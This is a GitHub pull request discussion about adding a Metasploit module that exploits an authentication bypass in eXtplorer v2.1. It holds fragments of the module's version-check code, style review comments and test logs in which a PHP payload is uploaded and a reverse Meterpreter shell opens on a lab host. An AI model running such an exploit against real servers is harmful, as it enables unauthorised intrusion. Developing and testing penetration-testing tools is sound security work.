New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add eXtplorer v2.1 auth bypass exploit module #1221
Conversation
}) | ||
|
||
return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /<version>2\.1\.(0RC5|0|1|2)<\/version>/ | ||
return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Seems like you could move the "if res and res.code == 200" into a parent if statement, and make these lines a bit shorter, then use an else for the safe check code.
I cannot reproduce this and I have a tried a few different tarballs. Can you paste me the md5 or, better yet, email the md5 and archive you used to brandon_perry@rapid7.com |
My Target URI was wrong. msf exploit(extplorer_upload_exec) > set TARGETURI / [] Started reverse handler on 192.168.1.31:4444 getuid meterpreter > |
}, | ||
'DefaultOptions' => | ||
{ | ||
'ExitFunction' => "none" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
you probably don't even need DefaultOptions at all.
Did cleanup by myself and retested: msf exploit(extplorer_upload_exec) > check [+] The target is vulnerable. msf exploit(extplorer_upload_exec) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] 192.168.1.138:80 - Authenticating as user (admin) [*] 192.168.1.138:80 - Authenticated successfully [*] 192.168.1.138:80 - Retrieving writable subdirectories [*] 192.168.1.138:80 - Successfully retrieved writable subdirectory (config) [*] 192.168.1.138:80 - Uploading PHP payload (1316 bytes) to /eXtplorer/config [+] 192.168.1.138:80 - File uploaded successfully [*] 192.168.1.138:80 - Searching directories for file (l3xVr4qUooRD.php) [+] 192.168.1.138:80 - Successfully found file [*] 192.168.1.138:80 - Executing payload (/eXtplorer/config/l3xVr4qUooRD.php) [*] Sending stage (39217 bytes) to 192.168.1.138 [*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.138:41454) at 2013-01-09 19:43:18 +0100 ^C[-] Exploit failed: Interrupt meterpreter > getuid Server username: www-data (33) meterpreter > sysinfo Computer : ubuntu OS : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686 Meterpreter : php/php meterpreter > merging! |
Add eXtplorer v2.1 authentication bypass vulnerability exploit module